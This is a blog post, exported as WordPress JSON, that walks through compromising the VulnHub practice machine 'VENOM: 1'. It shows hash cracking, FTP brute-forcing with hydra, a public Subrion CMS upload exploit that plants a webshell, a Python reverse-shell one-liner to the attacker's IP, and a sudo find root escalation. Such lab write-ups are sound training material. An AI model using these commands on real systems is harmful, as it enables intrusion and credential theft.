{"id":1304,"date":"2021-07-06T20:00:37","date_gmt":"2021-07-06T20:00:37","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1304"},"modified":"2021-07-06T20:00:37","modified_gmt":"2021-07-06T20:00:37","slug":"venom-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/06\/venom-1\/","title":{"rendered":"VENOM: 1"},"content":{"rendered":"<h2>About the Machine<\/h2>\n<p><strong>Description:<\/strong><br \/>\nThis machine was created for the OSCP Preparation. This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key.<\/p>\n<p><strong>VulnHub Page:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/venom-1,701\/\">https:\/\/www.vulnhub.com\/entry\/venom-1,701\/<\/a><\/p>\n<p><strong>Download Page:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/venom\/venom.zip\">https:\/\/download.vulnhub.com\/venom\/venom.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Let's start by locating the machine on the network.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep &quot;Systemtechnik&quot;\n192.168.101.26  08:00:27:60:99:87   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.101.24  netmask 255.255.255.0  broadcast 192.168.101.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 114813  bytes 7942166 (7.5 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 45989  bytes 2803643 (2.6 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>Let's continue with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 513\nStarting Nmap 7.91 ( 
https:\/\/nmap.org ) at 2021-07-06 15:38 EDT\nNmap scan report for venom.box (192.168.101.26)\nHost is up (0.00029s latency).\nNot shown: 65530 closed ports\nPORT    STATE SERVICE     VERSION\n21\/tcp  open  ftp         vsftpd 3.0.3\n80\/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: Subrion CMS - Open Source Content Management System\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Home :: Powered by Subrion 4.2\n139\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443\/tcp open  ssl\/https   Apache\/2.4.29 (Ubuntu)\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n445\/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\nMAC Address: 08:00:27:60:99:87 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.6\nNetwork Distance: 1 hop\nService Info: Host: VENOM; OS: Unix\n\nHost script results:\n|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s\n|_nbstat: NetBIOS name: VENOM, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: venom\n|   NetBIOS computer name: VENOM\\x00\n|   Domain name: \\x00\n|   FQDN: venom\n|_  System time: 2021-07-07T01:09:07+05:30\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-07-06T19:39:07\n|_  start_date: N\/A\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.29 ms venom.box (192.168.101.26)\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 22.50 seconds\n<\/code><\/pre>\n<p>I ran <strong>enum4linux<\/strong> against SMB and picked up two users. I then launched a brute-force attack against FTP and SMB with these users, but got no result. The relevant <strong>enum4linux<\/strong> output is below.<\/p>\n<pre><code>[+] Getting domain group memberships:\n\n ========================================================================= \n|    Users on 192.168.101.26 via RID cycling (RIDS: 500-550,1000-1050)    |\n ========================================================================= \n[I] Found new SID: S-1-22-1\n[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688\n[I] Found new SID: S-1-5-32\n[+] Enumerating users using SID S-1-22-1 and logon username &#039;&#039;, password &#039;&#039;\nS-1-22-1-1000 Unix User\\nathan (Local User)\nS-1-22-1-1002 Unix User\\hostinger (Local User)\n[+] Enumerating users using SID S-1-5-32 and logon username &#039;&#039;, password &#039;&#039;\nS-1-5-32-500 *unknown*\\*unknown* (8)\nS-1-5-32-501 *unknown*\\*unknown* (8)\n<\/code><\/pre>\n<p>The Nikto and gobuster output gave me nothing. However, in the source of the default Apache page I found a commented-out MD5 hash. 
I cracked it online.<\/p>\n<pre><code>5f2a66f947fa5690c26506f66bde5c23:hostinger<\/code><\/pre>\n<p>Thinking it might be a password, I fed it to hydra and managed to crack the FTP account.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/venom]\n\u2514\u2500# hydra -L users -P hash ftp:\/\/192.168.101.26 \nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-06 13:09:33\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5\/p:6), ~2 tries per task\n[DATA] attacking ftp:\/\/192.168.101.26:21\/\n[21][ftp] host: 192.168.101.26   login: hostinger   password: hostinger\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-06 13:09:37\n<\/code><\/pre>\n<p>With that, I connected over FTP and found a file.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/venom]\n\u2514\u2500# ftp 192.168.101.26\nConnected to 192.168.101.26.\n220 (vsFTPd 3.0.3)\nName (192.168.101.26:kali): hostinger\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 1002     1002         4096 May 21 23:43 files\n226 Directory send OK.\nftp&gt; cd files\n250 Directory successfully changed.\nftp&gt; ls\n200 PORT command successful. 
Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             384 May 21 23:43 hint.txt\n226 Directory send OK.\nftp&gt; pwd\n257 &quot;\/files&quot; is the current directory\nftp&gt; ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             384 May 21 23:43 hint.txt\n226 Directory send OK.\nftp&gt; get hint.txt\nlocal: hint.txt remote: hint.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for hint.txt (384 bytes).\n226 Transfer complete.<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/venom]\n\u2514\u2500# cat hint.txt  \n    Hey there... \n\nT0D0 --\n\n* You need to follow the &#039;hostinger&#039; on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=\n* some knowledge of cipher is required to decode the dora password..\n* try on venom.box\npassword -- L7f9l8@J#p%Ue+Q1234 -&gt; deocode this you will get the administrator password \n\nHave fun .. :)\n<\/code><\/pre>\n<p>After base64-decoding the value <strong>WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=<\/strong> four times we arrive at the string <strong>standard vigenere cipher<\/strong>.<br \/>\nAfter base64-decoding <strong>aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=<\/strong> once we arrive at <strong><a href=\"https:\/\/cryptii.com\/pipes\/vigenere-cipher\">https:\/\/cryptii.com\/pipes\/vigenere-cipher<\/a><\/strong>. I went to that page and decoded the password with the key <strong>hostinger<\/strong>. The result I obtained: <strong>E7r9t8@Q#h%Hy+M1234<\/strong><\/p>\n<p>After a long investigation I realised that, at first, I could not use this password anywhere. 
Later I went back to the note, <strong>try on venom.box<\/strong>; after adding it to \/etc\/hosts I came across a CMS. We can log in to this CMS with the credentials <strong>dora:E7r9t8@Q#h%Hy+M1234<\/strong>. Once inside, I changed dora's password to test.<\/p>\n<p>I had the CMS version information, so I searched for it in searchsploit.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/venom]\n\u2514\u2500# searchsploit Subrion CMS 4.2.1\n--------------------------------------------------------------- ---------------------------------\n Exploit Title                                                 |  Path\n--------------------------------------------------------------- ---------------------------------\nSubrion CMS 4.2.1 - &#039;avatar[path]&#039; XSS                         | php\/webapps\/49346.txt\nSubrion CMS 4.2.1 - Cross-Site Scripting                       | php\/webapps\/45150.txt\nSubrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)  | php\/webapps\/49876.py\n--------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/venom]\n\u2514\u2500# python3 49876.py -u http:\/\/venom.box\/panel\/ -l dora -p test\n[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n\n[+] Trying to connect to: http:\/\/venom.box\/panel\/\n[+] Success!\n[+] Got CSRF token: I1fcCoH4sE8QxkwA27KKirM7IN6gfLiPiV3Y9bxh\n[+] Trying to log in...\n[+] Login Successful!\n\n[+] Generating random name for Webshell...\n[+] Generated webshell name: jabtmcowewjzpcu\n\n[+] Trying to Upload Webshell..\n[+] Upload Success... Webshell path: http:\/\/venom.box\/panel\/uploads\/jabtmcowewjzpcu.phar \n\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n$ whoami\nwww-data\n<\/code><\/pre>\n<p>Reading the code really matters: for a long time I tried to run the exploit without a trailing slash on the URL, but once I read the code I realised I had to add it myself. We are in now. For a more usable shell I sent myself a reverse shell with Python.<\/p>\n<pre><code class=\"language-sh\">$ python -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.101.24&quot;,1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>We had already cracked the hostinger user's FTP account, so I logged in to the hostinger account. 
It was not much use, but I found the MySQL credentials.<\/p>\n<pre><code class=\"language-sh\">hostinger@venom:\/var\/www\/html\/subrion\/includes$ cat config.inc.php\ncat config.inc.php\n&lt;?php\n\/*\n * Subrion Open Source CMS 4.2.1\n * Config file generated on 20 May 2021 06:08:00\n *\/\n\ndefine(&#039;INTELLI_CONNECT&#039;, &#039;mysqli&#039;);\ndefine(&#039;INTELLI_DBHOST&#039;, &#039;localhost&#039;);\ndefine(&#039;INTELLI_DBUSER&#039;, &#039;eddie&#039;);\ndefine(&#039;INTELLI_DBPASS&#039;, &#039;v3n0mm0n3v&#039;);\ndefine(&#039;INTELLI_DBNAME&#039;, &#039;subrion&#039;);\ndefine(&#039;INTELLI_DBPORT&#039;, &#039;3306&#039;);\ndefine(&#039;INTELLI_DBPREFIX&#039;, &#039;sbr421_&#039;);\n\ndefine(&#039;IA_SALT&#039;, &#039;#5A7C224B51&#039;);\n\n\/\/ debug mode: 0 - disabled, 1 - enabled\ndefine(&#039;INTELLI_DEBUG&#039;, 0);\n<\/code><\/pre>\n<pre><code class=\"language-mysql\">MariaDB [subrion]&gt; select username, password, fullname from sbr421_members;\nselect username, password, fullname from sbr421_members;\n+------------+--------------------------------------------------------------+---------------+\n| username   | password                                                     | fullname      |\n+------------+--------------------------------------------------------------+---------------+\n| dora       | $2y$10$OKmYFixqCDv75JOAcrkC2Oqq1wZLzg3R1s1GeD88FZlAI8rRz4TJK | Administrator |\n| tester     | $2y$10$l6KUEFw\/OR9gSmuW3Cb.k.RhbwHPNXJzwfNHo\/MUjHDJsPkspRPHC | testtester    |\n| Tester@123 | $2y$10$WUnG9ihuoCtBj8ZtTKIJd.t.CI6AKk1OMyCb\/Yin9VwiC24E1gqIS | Testertest    |\n+------------+--------------------------------------------------------------+---------------+\n<\/code><\/pre>\n<p>While digging around inside, I found the <strong>nathan<\/strong> user's password.<\/p>\n<pre><code class=\"language-sh\">hostinger@venom:\/var\/www\/html\/subrion\/backup$ ls\nls\ntotal 12\ndrwxr-xr-x  2 www-data www-data 4096 
May 21 16:53 .\ndrwxr-xr-x 13 www-data www-data 4096 May 21 23:42 ..\n-rwxr-xr-x  1 www-data www-data   81 May 21 16:53 .htaccess\nhostinger@venom:\/var\/www\/html\/subrion\/backup$ cat .h    \ncat .htaccess \nallow from all\nYou_will_be_happy_now :)\nFzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\nhostinger@venom:\/var\/www\/html\/subrion\/backup$ su nathan\nsu nathan\nPassword: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\n\nnathan@venom:\/var\/www\/html\/subrion\/backup$ whoami\nwhoami\nnathan<\/code><\/pre>\n<p>What followed was extremely easy.<\/p>\n<pre><code class=\"language-sh\">nathan@venom:~$ sudo -l\nsudo -l\n[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\n\nMatching Defaults entries for nathan on venom:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser nathan may run the following commands on venom:\n    (root) ALL, !\/bin\/su\n    (root) ALL, !\/bin\/su<\/code><\/pre>\n<p>A pointless security measure: only \/bin\/su is denied, while every other command may still run as root...<\/p>\n<pre><code class=\"language-sh\">nathan@venom:~$ sudo find . -exec \/bin\/sh \\; -quit\nsudo find . -exec \/bin\/sh \\; -quit\n# id\nid\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt  snap\n# cat root.txt\ncat root.txt\n#root_flag\nH@v3_a_n1c3_l1fe.\n# \n<\/code><\/pre>\n<p>Simple machine.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>About the Machine Description: This machine was created for the OSCP Preparation. This box was created with virtualbox. 
For any queries please contact me on twitter:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1304","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1304"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304\/revisions"}],"predecessor-version":[{"id":1305,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304\/revisions\/1305"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}